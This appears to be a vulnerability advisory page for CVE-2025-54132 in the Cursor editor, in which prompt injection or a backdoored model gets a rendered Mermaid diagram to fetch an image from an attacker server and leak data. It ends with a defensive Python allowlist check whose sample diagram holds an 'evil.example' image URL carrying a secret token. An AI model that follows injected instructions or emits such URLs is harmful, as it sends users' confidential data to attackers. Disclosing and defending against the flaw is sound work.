CVE-2025-54132
BaseFortify
Publication date: 2025-08-01
Last updated on: 2025-08-25
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| anysphere | cursor | up to 1.3 (1.3 excluded) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
| CWE-NVD-CWE-noinfo | |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Cursor versions below 1.3, where the Mermaid diagram rendering feature allows embedding images that get rendered in the chat box. An attacker can exploit this by performing a prompt injection, causing Cursor to fetch an image from an attacker-controlled server, thereby exfiltrating sensitive information. This can also be triggered by a malicious model or backdoor. The vulnerability requires prompt injection from malicious data sources such as web input, image uploads, or source code. It is fixed in version 1.3.
How can this vulnerability impact me?
The vulnerability can lead to sensitive information being sent to an attacker-controlled external server without user consent or knowledge. This can result in data leakage and compromise of confidential information if an attacker successfully performs prompt injection or uses a malicious model to trigger the exploit.
What immediate steps should I take to mitigate this vulnerability?
Upgrade Cursor to version 1.3 or later, as this version contains the fix for the vulnerability. Additionally, avoid processing untrusted or malicious prompt data that could trigger prompt injection.
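One renderer-side control that addresses the mechanism described above, as an added example (not Cursor's code or the fix shipped in 1.3): before drawing model-generated Mermaid, refuse any diagram that references image hosts outside an allowlist, since each such reference becomes an outbound request carrying whatever an injected prompt placed in the URL. The allowlist host, the `evil.example` URL and the sample diagram are constructed for this example, and the `@{ img: ... }` node syntax is used illustratively.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist for this example: the only hosts the renderer may load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example-internal.test"}

# Matches absolute http(s) URLs and scheme-relative //host/path references,
# stopping at whitespace, quotes and brackets that delimit Mermaid attributes.
_URL_RE = re.compile(r"""(?i)(?:https?:)?//[^\s"'()<>\[\]{}]+""")


def external_image_refs(mermaid_src, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return every remote reference in the diagram whose host is not allowlisted.

    The renderer would fetch each of these while drawing the diagram, so a
    reference to an attacker-controlled host is the exfiltration channel the
    advisory describes: the request path and query string leave with the fetch.
    """
    flagged = []
    for url in _URL_RE.findall(mermaid_src):
        host = (urlparse(url).hostname or "").lower()
        if host not in allowed_hosts:
            flagged.append(url)
    return flagged


def render_if_safe(mermaid_src, render, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Call `render` only when the diagram carries no off-allowlist references."""
    bad = external_image_refs(mermaid_src, allowed_hosts)
    if bad:
        raise ValueError("diagram blocked, off-allowlist image reference(s): " + ", ".join(bad))
    return render(mermaid_src)


# Constructed sample: a model-generated diagram that smuggles a value out in an image URL.
SAMPLE_DIAGRAM = """flowchart LR
    A["Report"] --> B
    B@{ img: "https://evil.example/pixel.png?d=SECRET_TOKEN", label: "logo" }
"""

if __name__ == "__main__":
    print(external_image_refs(SAMPLE_DIAGRAM))
    try:
        render_if_safe(SAMPLE_DIAGRAM, lambda src: "<svg/>")
    except ValueError as exc:
        print(exc)
```

Logging the flagged URLs alongside the conversation id gives the detection signal; the check itself is the mitigation.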